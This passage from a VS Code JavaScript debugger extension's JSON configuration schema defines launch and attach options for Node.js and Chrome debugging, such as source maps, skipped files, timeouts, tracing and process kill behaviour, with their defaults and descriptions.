framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"userDataDir":{"default":true,"description":"By default, the browser is launched with a separate user profile in a temp folder. Use this option to override it. Set to false to launch with your default user profile. A new browser can't be launched if an instance is already running from `userDataDir`.","type":["string","boolean"]},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}}},"configurationSnippets":[],"deprecated":"Please use type chrome instead","label":"Web App (Chrome)","languages":["javascript","typescript","javascriptreact","typescriptreact","html","css","coffeescript","handlebars","vue"],"strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"pwa-chrome"},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"attach":{"properties":{"address":{"default":"localhost","description":"IP address or hostname the debugged browser is listening on.","type":"string"},"browserAttachLocation":{"default":null,"description":"Forces the browser to attach in one location. In a remote workspace (through ssh or WSL, for example) this can be used to attach to a browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"Port to use to remote debugging the browser, given as `--remote-debugging-port` when launching the browser.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":false,"markdownDescription":"Whether to reconnect if the browser connection is closed","type":"boolean"},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"targetSelection":{"default":"automatic","enum":["pick","automatic"],"markdownDescription":"Whether to attach to all targets that match the URL filter (\"automatic\") or ask to pick one (\"pick\").","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}},"launch":{"properties":{"browserLaunchLocation":{"default":null,"description":"Forces the browser to be launched in one location. In a remote workspace (through ssh or WSL, for example) this can be used to open the browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"cleanUp":{"default":"wholeBrowser","description":"What clean-up to do after the debugging session finishes. Close only the tab being debug, vs. close the whole browser.","enum":["wholeBrowser","onlyTab"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":null,"description":"Optional working directory for the runtime executable.","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"default":{},"description":"Optional dictionary of environment key/value pairs for the browser.","type":"object"},"file":{"default":"${workspaceFolder}/index.html","description":"A local html file to open in the browser","tags":["setup"],"type":"string"},"includeDefaultArgs":{"default":true,"description":"Whether default browser launch arguments (to disable features that may make debugging harder) will be included in the launch.","type":"boolean"},"includeLaunchArgs":{"default":true,"description":"Advanced: whether any default launch/debugging arguments are set on the browser. The debugger will assume the browser will use pipe debugging such as that which is provided with `--remote-debugging-pipe`.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how browser processes are killed when stopping the session with `cleanUp: wholeBrowser`. Can 